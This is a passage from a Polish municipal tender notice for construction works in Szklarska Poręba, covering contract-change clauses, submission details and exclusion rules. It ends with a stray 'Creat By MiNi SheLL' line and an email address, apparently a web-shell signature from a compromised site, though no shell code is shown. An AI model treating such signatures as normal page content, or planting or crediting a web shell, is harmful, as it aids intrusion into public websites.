1.5	wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych lub Siły wyższej uniemożliwiających  wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach. W takim przypadku umowny cykl realizacji zamówienia ulega przerwaniu, a jego ponowne wznowienie nastąpi po ustaniu niesprzyjających warunków atmosferycznych lub Siły wyższej.  Wystąpienie takiej okoliczności wymaga formy pisemnej, zaakceptowanej przez Zamawiającego.
Pojęcie Siły wyższej  zostało zdefiniowane w słowniku Wzoru umowy (Rozdział II.)

1.6	konieczności wykonania dodatkowych robót budowlanych i_lub robót zabezpieczających będących wynikiem znaleziska o znaczeniu historycznym lub archeologicznym, powodujących  uzasadnione, dodatkowe koszty. W takim przypadku umowny cykl realizacji zamówienia  ulega przerwaniu, a jego ponowne wznowienie nastąpi po otrzymaniu zgody Wojewódzkiego Konserwatora Zabytków. 

2.  Sporządzenia aneksu do umowy nie wymaga : zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego), zmiana kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu w przypadku pisemnego wyrażenia zgody przez Zamawiającego. 

3.  O interpretacji zdarzenia Siły wyższej i ewentualnym uznaniu przedłużenia terminu wykonania robót  z tego powodu, będzie decydował Burmistrz Miasta,  w trakcie realizacji robót, po złożeniu pisemnego wniosku Wykonawcy, mającego odzwierciedlenie w zapisach  wewnętrznego Dziennika budowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szklarskaporeba.bip.net.pl   zakładka: zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w wersji elektronicznej:nieodpłatnie_ze strony internetow.Zamawiającego
w wersji papierowej: w ciągu 5dni od złożenia wniosku do Zamawiającego z dowodem wpłaty 25zł (k-to jak dla wadium).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2016 godzina 10:00, miejsce: Urząd Miejski w Szklarskiej Porębie, 58-580 Szklarska Poręba, ul. M. Buczka 2  lub bezpośrednio w  Biurze Obsługi Interesanta - parter (adres  jw.),  w nieprzekraczalnym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W postępowaniu mogą wziąć udział wykonawcy, których  Zamawiający nie wykluczy z postępowania                     o udzielenie zamówienia publicznego za to, że w okresie 3lat przed wszczęciem postępowania, w sposób zawiniony wykonawca poważnie naruszył   obowiązki  zawodowe, w szczególności, gdy wykonawca w wyniku      
      zamierzonego działania lub rażącego niedbalstwa nie wykonał  lub nienależycie wykonał zamówienie,                     co Zamawiający jest w stanie wykazać za pomocą dowolnych  środków dowodowych ( art.24 ust.2a. upzp)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com